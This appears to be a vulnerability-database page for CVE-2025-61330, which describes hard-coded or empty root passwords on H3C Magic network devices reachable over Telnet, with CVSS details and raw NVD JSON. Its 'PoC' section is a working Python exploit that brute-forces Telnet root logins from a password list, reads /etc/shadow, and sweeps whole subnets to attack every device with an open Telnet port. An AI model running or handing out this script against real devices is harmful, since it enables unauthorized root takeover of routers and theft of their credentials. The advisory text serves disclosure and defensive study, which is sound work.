Security Vulnerability Report
中文
CVE-2025-61330 CVSS 6.5 MEDIUM

CVE-2025-61330

Published: 2025-10-16 18:15:37
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

A hard-coded weak password vulnerability has been discovered in all Magic-branded devices from Chinese network equipment manufacturer H3C. The vulnerability stems from the use of a hard-coded weak password for the root account in the /etc/shadow configuration or even the absence of any password at all. Some of these devices have the Telnet service enabled by default, or users can choose to enable the Telnet service in other device management interfaces (e.g. /debug.asp or /debug_telnet.asp). In addition, these devices have related interfaces called Virtual Servers, which can map the devices to the public network, posing the risk of remote attacks. Therefore, attackers can obtain the highest root privileges of the devices through the Telnet service using the weak password hardcoded in the firmware (or without a password), and remote attacks are possible.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

H3C Magic品牌全系列设备

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-61330 PoC - H3C Magic Hard-coded Weak Password Exploit # Description: Exploits hard-coded weak password in H3C Magic devices via Telnet import telnetlib import socket def exploit_h3c_magic(target_ip, port=23): """ Attempt to exploit CVE-2025-61330 by connecting via Telnet using hard-coded weak credentials. """ # Known hard-coded weak passwords for H3C Magic devices weak_passwords = [ "", # Empty password "admin", "root", "h3c", "magic", "1234", "12345", "123456", "password", "admin123", "root123", "huawei", "H3C", "test", "user", "default", "public", "private", "system", "manager" ] for password in weak_passwords: try: print(f"[*] Trying password: '{password}' on {target_ip}:{port}") # Establish Telnet connection tn = telnetlib.Telnet(target_ip, port, timeout=10) # Wait for login prompt tn.read_until(b"login:", timeout=5) tn.write(b"root\n") # Wait for password prompt tn.read_until(b"Password:", timeout=5) tn.write(password.encode() + b"\n") # Read response response = tn.read_until(b"$", timeout=5) if b"$" in response or b"#" in response or b">" in response: print(f"[+] SUCCESS! Logged in with password: '{password}'") # Execute commands to verify root access tn.write(b"id\n") output = tn.read_until(b"$", timeout=5) print(f"[+] Command output: {output.decode()}") tn.write(b"whoami\n") output = tn.read_until(b"$", timeout=5) print(f"[+] Current user: {output.decode()}") tn.write(b"cat /etc/shadow\n") output = tn.read_until(b"$", timeout=5) print(f"[+] Shadow file: {output.decode()}") tn.close() return True tn.close() except (socket.timeout, EOFError, ConnectionRefusedError) as e: print(f"[-] Connection failed: {e}") continue except Exception as e: print(f"[-] Error: {e}") continue print("[-] All password attempts failed") return False def scan_and_exploit(target_subnet): """ Scan a subnet for vulnerable H3C Magic devices and exploit them. """ import ipaddress network = ipaddress.ip_network(target_subnet, strict=False) for ip in network.hosts(): ip_str = str(ip) print(f"\n[*] Scanning {ip_str}...") try: sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.settimeout(2) result = sock.connect_ex((ip_str, 23)) sock.close() if result == 0: print(f"[+] Telnet port open on {ip_str}") exploit_h3c_magic(ip_str) except Exception as e: pass # Usage example: # exploit_h3c_magic("192.168.1.1") # scan_and_exploit("192.168.1.0/24") if __name__ == "__main__": import sys if len(sys.argv) > 1: target = sys.argv[1] exploit_h3c_magic(target) else: print("Usage: python poc.py <target_ip>")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-61330", "sourceIdentifier": "[email protected]", "published": "2025-10-16T18:15:37.313", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A hard-coded weak password vulnerability has been discovered in all Magic-branded devices from Chinese network equipment manufacturer H3C. The vulnerability stems from the use of a hard-coded weak password for the root account in the /etc/shadow configuration or even the absence of any password at all. Some of these devices have the Telnet service enabled by default, or users can choose to enable the Telnet service in other device management interfaces (e.g. /debug.asp or /debug_telnet.asp). In addition, these devices have related interfaces called Virtual Servers, which can map the devices to the public network, posing the risk of remote attacks. Therefore, attackers can obtain the highest root privileges of the devices through the Telnet service using the weak password hardcoded in the firmware (or without a password), and remote attacks are possible."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 2.5}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-259"}]}], "references": [{"url": "https://www.notion.so/25e8cd7f7805800a9a71c1193fb3cb43", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.